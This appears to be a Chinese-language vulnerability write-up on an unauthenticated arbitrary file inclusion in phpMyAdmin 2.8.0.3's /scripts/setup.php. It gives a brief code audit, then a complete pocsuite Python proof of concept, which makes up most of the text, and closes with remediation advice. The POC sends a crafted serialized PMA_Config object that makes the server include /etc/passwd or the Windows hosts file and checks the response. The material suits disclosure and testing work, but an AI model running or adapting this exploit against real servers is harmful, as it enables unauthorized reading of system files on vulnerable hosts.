0x01 代码审计
存在漏洞的文件是 /scripts/setup.php,先看第 10 行和第 28 行:
POST 传入的 configuration 参数被直接交给 unserialize,反序列化出来的对象类型和属性完全由请求方控制(下面的 POC 正是借此构造了一个 PMA_Config 对象并指定其 source 属性);而 setup.php 又引入了 common.lib.php。
接着看 common.lib.php 第 555 行:
common.lib.php 中引入了 Config.class.php,再看 Config.class.php 第 284 行:
最后是 load 方法:反序列化对象的 source 属性所指向的文件在这里被包含进来,因此 source 指向什么文件,什么文件就会被读取/执行,这就是标题所说的任意文件包含。
0x02 漏洞复现
POC(pocsuite 格式。_verify 通过让目标包含一个已知文件——/etc/passwd 或 Windows 的 hosts——并检查回显来确认漏洞,整个过程无需登录;只应对已获授权的目标使用):
#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import re
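class TestPOC(POCBase):
    """pocsuite POC for the phpMyAdmin 2.8.0.3 ``/scripts/setup.php`` unserialize bug.

    ``setup.php`` hands the POSTed ``configuration`` parameter straight to
    ``unserialize``; a crafted ``PMA_Config`` object whose ``source``
    attribute names a file makes the later ``load()`` include that file,
    i.e. an unauthenticated arbitrary file include.

    Verification is read-only: it asks the target to include one
    well-known file (``/etc/passwd`` or the Windows hosts file) and looks
    for a marker string in the response. Run it only against systems you
    are authorised to test.
    """

    vulID = '1'  # ssvid
    version = '1.0'
    author = ['whoam1']
    vulDate = '2016-04-23'
    createDate = '2016-08-24'
    updateDate = '2016-08-24'
    references = ['http://www.seebug.org/vuldb/ssvid-']
    name = 'phpmyadmin unserialize getshell'
    appPowerLink = 'https://www.phpmyadmin.net/'
    appName = 'phpmyadmin'
    appVersion = '2.8.0.3'
    vulType = '文件包含'
    desc = '''
/scripts/setup.php
'''
    samples = ['']
    install_requires = ['']
    # Avoid third-party modules where possible; when one is unavoidable, fill
    # in install_requires as described in
    # https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明

    # (path to include, marker substrings that prove the file was echoed back).
    # '/bin/bash' is the original marker; 'root:x:0:0:' is added because hosts
    # without bash (busybox, minimal containers) still have a root entry.
    _LINUX_PROBE = ('/etc/passwd', ('/bin/bash', 'root:x:0:0:'))
    # 'Windows' appears in the comment header of a stock hosts file; a trimmed
    # hosts file would be missed. NOTE(review): whether the setup page's own
    # HTML can contain 'Windows' (false positive) has not been checked.
    _WINDOWS_PROBE = ('c:/windows/system32/drivers/etc/hosts', ('Windows',))

    _USER_AGENT = ('Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '
                   '(KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36')

    @staticmethod
    def _payload(path):
        """Return the POST body that makes setup.php include *path*.

        The body is a serialized ``PMA_Config`` object with a single
        ``source`` property. PHP's unserialize grammar terminates every
        element with ``;`` (the original hand-written payload used ``,``
        after the property name, which PHP's parser rejects), and the
        string length prefix is computed so the payload stays valid for
        any probe path.
        """
        return ('configuration=O:10:"PMA_Config":1:{s:6:"source";s:%d:"%s";}'
                '&action=test' % (len(path), path))

    @classmethod
    def _build_headers(cls, set_cookie):
        """Browser-like request headers for the probe.

        The ``phpMyAdmin`` session cookie is forwarded only when the
        target actually issued one; the original indexed ``findall()[0]``
        and crashed with IndexError on a response without Set-Cookie.
        """
        headers = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': cls._USER_AGENT,
        }
        match = re.search(r'phpMyAdmin=([^;]*)', set_cookie or '')
        if match:
            headers['cookie'] = 'phpMyAdmin=' + match.group(1)
        return headers

    def _attack(self):
        """Attack mode performs exactly the read-only verification.

        The original draft only left a note here about a remote-include
        variant (``source`` pointing at an ftp:// URL, which would also
        require the target's PHP to permit URL includes) and never
        implemented it, so nothing beyond the probe is done.
        """
        return self._verify()

    def _verify(self):
        """Probe the target and return a pocsuite ``Output``.

        One GET collects the session cookie and the ``Server`` header.
        The header only decides which probe goes first: a parenthesised
        OS name such as ``Apache/2.2 (Ubuntu)`` suggests Linux. Because
        Apache on Windows reports ``(Win32)`` as well, the heuristic is
        not trusted — both probes are tried before reporting failure.
        Unlike the original, a negative result is reported through
        ``parse_output`` instead of silently returning ``None``.
        """
        result = {}
        base = self.url.rstrip('/')  # avoid '//scripts/setup.php' on a trailing-slash url
        first = req.get(base)
        headers = self._build_headers(first.headers.get('Set-Cookie', ''))
        server = first.headers.get('Server', '') or ''

        probes = [self._LINUX_PROBE, self._WINDOWS_PROBE]
        if '(' not in server:
            probes.reverse()

        vul_url = base + '/scripts/setup.php'
        for path, markers in probes:
            resp = req.post(vul_url, headers=headers, data=self._payload(path))
            # .text rather than .content so the substring test works whether
            # the body is str (Python 2) or bytes (Python 3).
            body = resp.text
            if any(marker in body for marker in markers):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                break
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an ``Output``: success when non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output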
# Make the POC discoverable by the pocsuite runner.
register(TestPOC)
0x03 修复方案
升级到官方最新版本。此外,phpMyAdmin 安装配置完成后应删除 /scripts/setup.php(本文的漏洞入口),或在 Web 服务器层面限制其访问——上面的 POC 说明该入口无需登录即可触达。
本文始发于微信公众号(飓风网络安全):Phpmyadmin2.8.0.3任意文件包含漏洞